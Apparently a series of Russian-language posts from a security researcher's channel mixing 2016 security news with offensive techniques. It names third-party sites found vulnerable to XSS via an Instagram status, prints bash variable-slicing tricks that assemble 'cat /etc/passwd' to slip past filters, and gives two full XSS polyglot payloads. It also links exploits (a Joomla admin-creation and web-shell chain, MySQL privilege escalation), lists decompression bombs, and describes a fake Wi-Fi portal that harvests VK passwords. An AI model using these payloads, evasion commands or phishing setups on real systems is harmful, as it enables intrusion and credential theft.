Не умеют парсить.
Сунул я как-то XSS вектор в статус instagram, без повода и цели - смотрю, а XSS срабатывает. Начал отправлять себе на сервер содержимое окна, текущий урл, получился такой вот сниффер. Так вот, XSS сработали на:

- findgram.me
- imgrab.com
- instagy.com
- iconosquare.com
- tofo.me
- photo.sh
- gramosphere.com

Что за сервисы я не сильно представляю, но с фильтрацией пользовательских данных у них не очень.

За большинством кибератак стоят дети и мошенники, а не государство
https://goo.gl/Wyr8JG

И ещё о bash.

Из переменных (и не только) можно склеивать команды, тем самым можно обойти системы обнаружения и фильты (ну мало ли).

Например, переменная COMP_WORDBREAKS — набор символов рассматриваемые как разделители слов.

echo $COMP_WORDBREAKS
вернет
"'><=;|&(:

Обращаясь к переменным, в таком представлении, можно вернуть один или несколько символов (первое после двоеточия число - начальное значение символа, вторая цифра - количество символов)

echo ${COMP_WORDBREAKS:11:2}
вернет (:

Подобным образом можно собрать полноценную команду, склеивая кусочки переменных
cat${COMP_WORDBREAKS:0:1}${PATH:0:1}etc${HOME:0:1}passwd
что будет интерпретировано как cat /etc/passwd

Ну или даже так:
${SHELLOPTS:3:1}at ${PATH:0:1}${SHELLOPTS:4:1}t${SHELLOPTS:3:1}${HOME:0:1}p${SHELLOPTS:2:1}sswd

Кстати, тот самый доклад Владимира Иванова, о котором я говорю в описании своего доклада :)

https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf

Версия на русском:
https://youtu.be/50Sv1_nsjnE?t=9m37s

¯ \ _ (ツ) _ / ¯

Вышел новый ядерный эксплойт повышения привелегий до суперпользователя в linux, в том числе под свежие ядра, использует race condition, а именуется грязной скотиной

https://dirtycow.ninja

Сегодня часть интернета не работает. Не удивляйтесь, если твиттер или гитхаб не откроется.

http://thehackernews.com/2016/10/dyn-dns-ddos.html

А если ты очень хочешь на ZeroNights, но внутренний еврей не позволяет тебе заплатить - го в волонтёры!

https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/

А ещё билет можно выиграть в hackquest'е

https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/

Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla?
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.

https://github.com/XiphosResearch/exploits/tree/master/Joomraa

А все из-за того, что расширение pht может интерпритироваться также как php, php7, phtml, etc :)

https://telegram.me/bo0om_ru/45

В сети появился эксплойт под MySQL / MariaDB / PerconaDB - поднятие привелегий до root'а (опять race condition, ога).
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/

А как насчёт бомб? Приготовил небольшой сборник:

42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт

r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри

r.gz и r.tar.gz - аналогичные gzip-бомбы

droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя

spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти

Универсаньные xss-вектора

Вектор с thespanner уже стал классическим, несколько лет назад о нем писал Raz0r. Отрабатывает в атрибутах, закрывает теги, покрывает bb-code, разворачивает изображение на весь экран с алертом

javanoscript:/*-->]]>%>?></noscript></noscript></textarea></nonoscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javanoscript:eval(name)//>"

Менее короткий, но не менее интересный xss-полиглот, работает за счет множества комментов и имеет вложенные закрывающие теги (понравился подход), которые закрываются еденичным --!>
Не покрывает только double encoding и html entities, но всё в твоих руках :)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Помните, tlgm.ru был в XSS'ках от моего канала?

Вот новый парсер каналов подтянулся
https://tgram.ru/channels/bo0om_ru

RCE с помощью DNS запроса - изи катка.
Жаль, что самое интересное скрыли, через месяц появится в паблике полная версия, так что оставлю это здесь.

Опасный резолв. Разбираем на пальцах три мощных вектора атак через DNS
https://goo.gl/hDHNV3

Когда-то делал вот такую штуку на базе mr-3040, забавы ради. Под видом бесплатного вайфая (с mana) раздаётся точка доступа. Интернета, там, естественно нет, но мы об этом не говорим, а в качестве регистрации (или при попытке открыть любой сайт) нужно ввести логин и пароль к VK (который в любом случае скажет, что пароль неверный). Встроенного аккумулятора хватает на часов 5, размер меньше телефона, такая вот мобильная штука - ловушка для любителей халявы.